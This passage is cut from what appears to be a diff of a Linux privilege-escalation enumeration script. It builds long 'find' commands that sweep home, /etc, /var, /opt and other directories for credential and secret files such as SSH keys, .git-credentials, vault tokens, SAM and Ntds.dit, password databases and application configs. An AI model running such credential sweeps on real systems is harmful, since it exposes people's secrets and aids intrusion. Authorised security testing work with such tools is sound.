\".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"*knockd*\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"ssh*config\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"system.d\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_BIN=`eval_bckgrd "find /bin -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o 